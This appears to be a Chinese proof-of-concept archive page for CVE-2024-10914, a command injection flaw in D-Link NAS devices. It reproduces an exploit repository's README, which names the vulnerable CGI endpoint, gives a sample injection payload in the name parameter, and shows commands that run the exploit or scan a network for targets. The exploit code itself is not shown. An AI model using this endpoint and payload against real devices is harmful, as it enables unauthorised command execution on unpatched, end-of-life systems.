关联漏洞
标题:
D-Link多款产品 安全漏洞
(CVE-2024-10914)
描述:D-Link DNS-320等都是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。 D-Link多款产品存在安全漏洞,该漏洞源于对参数name的错误操作会导致操作系统命令注入。以下产品及版本受到影响:D-Link DNS-320、DNS-320LW、DNS-325和DNS-340L 20241028版本及之前版本。
描述
dlink vulnerability thing in python and rust
介绍
# CVE-2024-10914 ported to rust and python
because why not
## what is this
cve-2024-10914 is a recently discovered 9.8 critical score vulnerability that affects some dlink routers. because those routers reached their eol support, dlink refuses to patch this vulnerability because "stop being poor and just buy a new router".
## how does this work
the vulnerable devices expose an http endpoint, usually under `/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=<user_input>`. due to improper sanitization, instead of strictly limiting or validating the input (only allowing alphanumeric characters), the application allows any character to be injected, which includes special characters used for command line operations, hence allowing for arbitrary code execution.
by inserting shell metacharacters (such as ; | & or $(command)) in the name field, anyone can run shell commands with ease. for example:
`...name=admin'; echo 'get pwned bozo'; #`
all these script do is send a request with the name parameter changed to whatever code you want to run.
there's a pretty good video by fireship that explains it into more detail: https://www.youtube.com/watch?v=52v6gKPA4TM
## how 2 use:
first you need to have a vulnerable device, some models include:
- DNS-320 (Version 1.00)
- DNS-320LW (Version 1.01.0914.2012)
- DNS-325 (Versions 1.01, 1.02)
- DNS-340L (Version 1.08)
i strongly advise against using this script against someone else without their consent, please only do this stuff if you own the router or you have the owner's consent
### rust
- if you already know the device ip address:
> `cargo run -- -u http://<device ip address>`
- if you want to perform a quick network scan:
> `cargo run`
### python
- first install dependencies
> `pip install -r requirements.txt`
- if you already know the device ip address:
> `python main.py -u http://<device ip address>`
- if you want to perform a quick network scan:
> `python main.py`
then follow instructions
## credits
i did not come up with the original code, [verylazytech](https://github.com/verylazytech/) did. i only ported it to rust and python because why the fuck not. of course all credit goes to him and any other person involved in the discovery of this exploit.
https://github.com/verylazytech/CVE-2024-10914/
文件快照
[4.0K] /data/pocs/961638098286e8443636c0933b5e781bed140274
├── [ 47K] Cargo.lock
├── [ 246] Cargo.toml
├── [4.0K] main.py
├── [2.2K] README.md
├── [ 8] requirements.txt
└── [4.0K] src
└── [5.4K] main.rs
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。